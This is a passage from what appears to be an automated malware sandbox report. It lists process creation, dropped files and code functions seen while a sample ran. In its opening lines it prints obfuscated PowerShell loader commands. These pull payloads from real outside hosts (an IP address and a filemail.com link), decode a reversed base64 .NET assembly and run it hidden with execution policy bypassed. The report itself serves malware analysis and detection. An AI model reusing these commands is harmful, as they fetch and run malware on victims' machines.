HJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))"Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzZVlpbWFnZVUnKydybCA9IFB1SWh0JysndHBzJysnOicrJy8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbCcrJ2UvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3QnKydHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgUHVJO3NlWXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c2VZaW1hZ2VCeXRlcyA9IHNlWXdlYkNsaWVuJysndC5Eb3dubG9hZERhdGEoc2VZaW1hZ2VVcmwpO3NlWWltYWcnKydlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHNlWWltYWdlQnl0JysnZXMpO3NlWXN0YXJ0RmxhZyA9IFB1STw8QkFTRTY0XycrJ1NUQVJUPj5QdUk7c2VZZW5kRicrJ2xhZyA9IFB1SScrJzw8QkFTRTY0X0VORD4+UHVJO3NlWXN0YXJ0SW5kZXggPSBzZVlpbWFnZVRleHQuSW5kZXhPZignKydzZVlzdGFydEZsYWcpO3NlWWVuZCcrJ0luZGV4ID0gc2VZaW1hZ2VUZXh0LkluZGV4T2Yoc2VZZW5kRmxhZyk7cycrJ2VZc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNlWWVuZEluZGV4IC1ndCBzZVlzdGFydEluZGV4O3MnKydlWXN0YXJ0SW5kZXggKz0gc2VZc3RhcnRGbGFnLkxlbmd0aDtzZVliYXNlNjRMZW5ndGggPSBzZVllbmRJbmRleCAtIHNlWXN0YXJ0SW5kZXg7c2VZYmFzZTY0Q29tbWFuZCA9JysnIHNlJysnWWltYWcnKydlVCcrJ2V4dC5TdWJzdHJpbmcoc2VZc3RhcnRJbmRleCwnKycgc2VZYmFzZTY0TGVuZ3RoKTtzZVliYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzZVliYXNlNjRDb21tYW5kJysnLlRvQ2hhckFycmF5KCkgMnBPIEZvckUnKydhY2gtT2JqZWN0IHsgc2VZXyB9KVstMS4uLShzZVknKydiYXNlNjRDb21tYW5kLkxlbmd0aCldO3NlWScrJ2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQycrJ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJysnc2VZYmFzZTY0UmV2ZXJzZWQpO3NlWScrJ2xvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsJysnZWN0aW9uLkFzc2VtYmx5XScrJzo6TG9hZChzZVljb21tYW5kQnl0ZXMpO3NlWXZhaU1ldGhvZCA9IFsnKydkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoUHVJVkFJUHVJKTtzZVl2YWlNZScrJ3Rob2QuSW52bycrJ2tlKHNlWW51bGwsIEAoUHVJdHh0LlRHUkZGUlcvMzUvODcxLjQ0LjI3MS43MDEvLycrJzpwdHRoUHVJLCBQdUlkZXNhdGl2YWRvUHVJLCBQdUlkJysnZXNhdGl2YWRvUHVJLCBQdScrJ0lkZXNhdGl2YWRvUHVJLCBQdUlhc3BuZXRfY29tcGlsJysnZXJQdUksIFB1SWRlc2F0aXZhZG9QdUksICcrJ1B1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkbycrJ1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1SWRlc2F0aXZhZG9QdUksUHVJZGVzYXRpdmFkb1B1SSxQdUlkZXNhdGl2YWRvUHVJLFB1STFQdUksUHVJZGVzYXRpdmFkb1B1SSkpOycpLnJFUGxhQ0UoJ1B1SScsW1N0ckluR11bQ0hBUl0zOSkuckVQbGFDRSgnMnBPJywnfCcpLnJFUGxhQ0UoJ3NlWScsJyQnKXwgLiAoKGdWICcqTWRyKicpLm5BbUVbMywxMSwyXS1qT0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe'+'thod.Invo'+'ke(seYnull, @(PuItxt.TGRFFRW/35/871.44.271.701//'+':ptthPuI, PuIdesativadoPuI, PuId'+'esativadoPuI, Pu'+'IdesativadoPuI, PuIaspnet_compil'+'erPuI, PuIdesativadoPuI, '+'PuIdesativadoPuI,PuIdesativado'+'PuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuI1PuI,PuIdesativadoPuI));').rEPlaCE('PuI',[StrInG][CHAR]39).rEPlaCE('2pO','|').rEPlaCE('seY','$')| . ((gV '*Mdr*').nAmE[3,11,2]-jOIN'')"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tnaq44gy\tnaq44gy.cmdline"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tnaq44gy\tnaq44gy.cmdline"Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_02DC9247 LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,17_2_02DC9247
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_07D933B3 push FFFFFF8Bh; retf 3_2_07D933BC
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_07D93582 push FFFFFF8Bh; iretd 3_2_07D9358B
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_07D93549 push FFFFFF8Bh; iretd 3_2_07D93552
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_07D91431 push FFFFFF8Bh; iretd 3_2_07D9143A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_0040134A pushfd ; retf 13_2_00401353
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_004012F2 pushfd ; retf 13_2_004012F3
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_3_05CB9C40 pushfd ; retf 17_3_05CB9C42
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_3_05CB9719 push eax; ret 17_3_05CB9725
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_3_05CBA53C pushfd ; retf 17_3_05CBA53E
                Source: C:\Windows\explorer.exeCode function: 18_2_001E1405 push esi; ret 18_2_001E1407
                Source: C:\Windows\explorer.exeCode function: 18_2_001E47A7 push esp; iretd 18_2_001E47A8
                Source: C:\Windows\explorer.exeCode function: 18_2_001E14D4 push esi; ret 18_2_001E14D6
                Source: C:\Windows\explorer.exeCode function: 18_2_001EA055 push es; iretd 18_2_001EA05D
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_0066967E push ds; retf 19_2_00669680
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_006694E6 push edx; ret 19_2_006694E7
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_006638A7 push esp; iretd 19_2_006638A8
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_030487CE push es; ret 20_2_03048A18
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_03048EEF push edi; ret 20_2_03048EF0
                Source: C:\Windows\explorer.exeCode function: 21_2_00711405 push esi; ret 21_2_00711407
                Source: C:\Windows\explorer.exeCode function: 21_2_007114D4 push esi; ret 21_2_007114D6
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_00323417 push esp; iretd 22_2_00323418
                Source: C:\Windows\explorer.exeCode function: 26_2_007214D4 push esi; ret 26_2_007214D6
                Source: C:\Windows\explorer.exeCode function: 26_2_007245A7 push esp; iretd 26_2_007245A8
                Source: C:\Windows\explorer.exeCode function: 26_2_00721405 push esi; ret 26_2_00721407
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 27_2_02D53627 push esp; iretd 27_2_02D53628
                Source: C:\Windows\explorer.exeCode function: 28_2_00ABAC8D push esp; iretd 28_2_00ABAC95
                Source: C:\Windows\explorer.exeCode function: 28_2_00ABAAD2 push ebp; iretd 28_2_00ABAAD3
                Source: C:\Windows\explorer.exeCode function: 28_2_00AB1405 push esi; ret 28_2_00AB1407
                Source: C:\Windows\explorer.exeCode function: 28_2_00AB4817 push esp; iretd 28_2_00AB4818
                Source: C:\Windows\explorer.exeCode function: 28_2_00AB14D4 push esi; ret 28_2_00AB14D6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\tnaq44gy\tnaq44gy.dllJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\djvbaaeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\djvbaaeJump to dropped file

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\djvbaae:Zone.Identifier read attributes | delete
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_03043862 GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpiA,lstrcmpiA,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpiA,GetCommandLineA,StrStrIA,lstrcmpiA,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep,20_2_03043862
                Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
